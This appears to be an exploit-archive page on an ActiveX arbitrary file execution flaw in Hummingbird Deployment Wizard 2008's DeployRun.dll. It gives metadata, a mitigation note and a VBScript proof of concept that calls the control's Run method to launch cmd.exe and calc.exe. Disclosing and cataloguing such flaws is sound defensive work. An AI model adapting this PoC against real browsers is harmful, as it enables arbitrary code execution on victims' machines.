header-logo
Suggest Exploit
vendor:
Hummingbird Deployment Wizard 2008
by:
shinnai
7.5
CVSS
HIGH
Arbitrary File Execution
94
CWE
Product Name: Hummingbird Deployment Wizard 2008
Affected Version From: 10.0.0.44
Affected Version To: 10.0.0.44
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution

Hummingbird Deployment Wizard 2008 (DeployRun.dll) is vulnerable to arbitrary file execution. The vulnerable method is Sub Run (ByVal Path As String , ByVal CommandLine As String). This exploit was tested on Windows XP Professional SP3 full patched, with Internet Explorer 7.

Mitigation:

Update to the latest version of Hummingbird Deployment Wizard 2008 (DeployRun.dll) to mitigate this vulnerability.
Source

Exploit-DB raw data:

------------------------------------------------------------------------------
 Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution
 url: http://www.hummingbird.com

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.net

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.
 
 Info:
 DeployRun.dll <= 10.0.0.44
 
 Marked as:
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe:  Safe for untrusted: caller,data  
 IPersist Safe:  Safe for untrusted: caller,data

 Vulnerable method:
 Sub Run (ByVal Path  As String , ByVal CommandLine  As String)

 Tested on Windows XP Professional SP3 full patched, with Internet Explorer 7

 There are a lot of dangerous methods, just take a look and... good searching
------------------------------------------------------------------------------
<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
 Sub tryMe
   test.Run "cmd.exe", "/C calc.exe"
 End Sub
</script>

# milw0rm.com [2008-10-17]

Navigation

Suggest Exploit

Services By CQR